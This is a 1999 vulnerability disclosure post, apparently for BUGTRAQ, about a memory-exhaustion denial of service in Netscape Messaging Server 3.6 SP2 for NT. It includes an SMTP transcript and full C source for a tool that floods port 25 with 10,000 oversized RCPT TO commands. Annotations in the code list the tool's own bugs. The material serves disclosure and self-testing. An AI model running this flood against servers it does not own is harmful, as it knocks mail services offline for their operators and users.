I've discussed with Netscape's engineer for 7 weeks about the RCPT TO vulnerability. I reported it to them on 7th Sep. as follows...

220 victim.workgroup ESMTP server (Netscape Messaging Server - Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900
helo rcpt2
250 victim.workgroup
mail from : rcpt2
250 Sender <rcpt2> Ok
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....
... 10,000 times ...

Then the victim server's allocated memory size increased until no more memory was available, and it was never freed after that. The CPU meter indicated 100% while the server was receiving RCPT TO. I tested on 128 MB RAM and had no physical memory left after 50 minutes. I tested on Netscape Messaging Server 3.6 SP2 for NT. Netscape said that they will release Messaging Server 4.15 for NT in December and will fix this problem. I guess they will fix this and other problems at the same time... I think the vulnerability should be fixed soon with a patch and a public announcement. I've already told Netscape that I would post this to BUGTRAQ. Examination code (rcpt2.c) for YOUR server follows...

------------- cut here -----------------------------------------
/***************************************************************
 You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
 whether it is vulnerable to too many RCPT TO commands or not.
 by Nobuo Miwa, LAC Japan 28th Oct.
1999 http://www.lac.co.jp/security/

 What this program does (the post above describes the observed effect):
 it connects to TCP port 25 of the given IPv4 address, sends HELO and
 MAIL FROM, then sends RCPT2_NUMBER copies of a single RCPT TO line whose
 recipient address is just under RCPT2_LENGTH bytes long, printing the
 start of each reply.  The post reports that the 3.6 SP2 server answered
 250 to every such recipient while its memory use grew and was never
 released; the vendor's stated remedy is the 4.15 release named above.

 Notes on the code as posted:
   - close() and inet_addr() are declared in <unistd.h> and <arpa/inet.h>,
     neither of which is included, so those calls rely on implicit
     declarations (an error on current compilers).
   - The SMTP commands are terminated with a bare "\n", not the CRLF the
     protocol specifies.
   - Defects in the tool itself are marked inline below (unterminated
     strncpy, unchecked send()/recv() results, %d used for a size_t,
     unbounded strcpy from argv).
****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define STR_HELO "HELO rcpt2\n"            /* greeting sent after the banner */
#define STR_MAILFROM "MAIL FROM:rcpt2\n"   /* envelope sender */
#define RCPT2_LENGTH 8000                  /* size of the RCPT TO line buffer */
#define RCPT2_NUMBER 10000                 /* number of RCPT TO commands sent */

/*
 * Connect a TCP socket to port 25 of the dotted-quad IPv4 address in
 * hostIPaddr, filling *si with the destination address.
 *
 * Returns the connected descriptor, or -1 if socket() or connect() fails.
 * The inet_addr() result is not checked: an unparsable address yields
 * INADDR_NONE, which is then used as the destination.
 */
int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
    int port=25, sd, rt ;
    long li ;              /* unused */
    struct hostent *he;    /* unused; no name resolution is performed */

    si->sin_addr.s_addr = inet_addr(hostIPaddr);
    si->sin_family = AF_INET;
    si->sin_port = htons (port);

    sd = socket (si->sin_family, SOCK_STREAM, 0);
    if (sd == -1) return (-1);

    rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in));
    if ( rt < 0 ) { close(sd); return(-1); }
    return(sd) ;
}

/*
 * Drive the SMTP session on the already-connected descriptor sd: read the
 * banner, send HELO and MAIL FROM (echoing each reply to stdout), build one
 * RCPT TO line whose address is "rcpt2@" followed by runs of 'a' until the
 * buffer is nearly full, then send that same line RCPT2_NUMBER times,
 * printing at most the first 60 bytes of each reply.
 *
 * Error handling is minimal: send() and recv() results are not acted on,
 * so a connection the server drops mid-run is not detected here.
 */
void sendRCPT2(int sd)
{
    char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80];
    int rt, i;

    /* Banner.  tmpStr is zeroed first so the reply is NUL-terminated for
     * printf(); the recv() result itself is ignored. */
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    recv( sd, tmpStr, sizeof(tmpStr), 0 );
    printf("%s",tmpStr);

    printf("%s",STR_HELO);
    send( sd, STR_HELO, strlen(STR_HELO), 0 );   /* result unchecked */
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    rt = recv( sd, tmpStr, sizeof(tmpStr), 0 );
    if ( rt>0 ) printf("%s",tmpStr);

    printf("%s",STR_MAILFROM);
    send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);  /* result unchecked */
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    rt = recv(sd, tmpStr, sizeof(tmpStr), 0);
    if ( rt>0 ) printf("%s",tmpStr);

    /* Build the oversized recipient once: append ten 'a's while more than
     * 10 bytes of the buffer remain, then the newline.  Starting at 15
     * bytes and growing by 10, the loop stops at 7995 bytes, so the line,
     * the "\n" and the terminator all fit within RCPT2_LENGTH. */
    strcpy( rcptStr, "RCPT TO: rcpt2@" ) ;
    while ( RCPT2_LENGTH-strlen(rcptStr)>10 ) strcat( rcptStr, "aaaaaaaaaa") ;
    strcat( rcptStr, "\n" );

    for ( i=0 ; i<RCPT2_NUMBER ; i++ ) {
        /* BUG: strlen() returns size_t but is printed with %d
         * (mismatched format specifier). */
        printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,strlen(rcptStr));
        send( sd, rcptStr, strlen(rcptStr), 0 );  /* result unchecked */
        /* tmpStr is not cleared inside the loop, so a reply shorter than
         * the previous one leaves stale bytes after it; only the first 60
         * bytes are shown below, so this mostly affects what is printed. */
        rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 );
        /* BUG: strn is never initialised and strncpy() writes no
         * terminator when the reply is 60 bytes or longer, so the
         * printf() below can read past the copied bytes. */
        strncpy( strn, tmpStr, 60 ) ;
        if ( rt>0 ) printf("%s \n",strn);
    }
    return;
}

/*
 * Entry point.  argv[1] is the server's IPv4 address in dotted-quad form.
 * Exit status: 1 on bad usage, -1 (255 to the shell) if the connection
 * fails, 0 otherwise.
 */
int main (int argc, char *argv[])
{
    char hostIPaddr[80], *cc, *pfft;   /* cc and pfft are unused */
    int sd = 0;
    struct sockaddr_in si;

    printf("You can use ONLY for YOUR Messaging Server 3.6\n");
    if (argc != 2) { printf("Usage: %s IPaddress \n",argv[0]); exit(1); }
    /* BUG: unbounded copy of argv[1] into an 80-byte buffer. */
    else strcpy (hostIPaddr, argv[1]);

    sd = openSocket(&si,hostIPaddr);
    /* openSocket() signals failure with -1; this test also rejects
     * descriptor 0, which socket() would only hand out if stdin had been
     * closed beforehand. */
    if (sd < 1) { printf("failed!\n"); exit(-1); }

    sendRCPT2( sd );
    close (sd);
    exit(0);
}